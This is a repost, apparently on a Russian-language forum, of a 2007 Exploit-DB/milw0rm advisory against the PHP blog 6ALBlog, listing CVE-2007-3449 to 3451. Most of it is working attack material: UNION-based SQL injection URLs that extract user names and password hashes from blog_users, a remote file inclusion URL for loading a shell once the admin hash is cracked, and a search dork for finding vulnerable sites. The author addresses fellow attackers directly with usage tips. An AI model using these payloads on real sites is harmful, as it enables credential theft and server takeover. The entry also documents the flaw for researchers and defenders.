- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4104
- Проверка EDB
-
- Пройдено
- Автор
- CRACKERS_CHILD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3451 cve-2007-3450 cve-2007-3449
- Дата публикации
- 2007-06-25
Код:
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Portal.......: 6ALBlog All Versions
* [~] Download.....: http://down.otand.com/download/code/php/blog/6alblog.rar
* [~] Author.......: Crackers_Child | [email protected] & [email protected]
* [~] Class........: Remote SQL Injection and Remote File Ä°nclude Vulnerability
* [~] Dork.........: inurl:"member.php?page=comments
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Exploit Sql...: http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/*
* http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users/*
*
*
* [~] Exploit Rfi...: After Cracked md5 admin you must login site.com/admin/ than our rfi can work
*
* http://[Taget]/[Path]/admin/index.php?pg=Sh3ll?
+_______________________________________________________________________________________________________________________+
[~] Ä°nfo......:Brothas You must change MemberName on exploit , when you look index.php you will see members and you can choose anyone
and you can write it on exploit "MEMBERNAME" area ;)
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Sp Tnx.......: str0ke, BiyoSecurity.Net, TurkProtest, Tryag.com/cc/(Mahmood_ali),Dj7xpl,Dosyacek.com And All Friends
*
+_______________________________________________________________________________________________________________________+
# milw0rm.com [2007-06-25]
- Источник
- www.exploit-db.com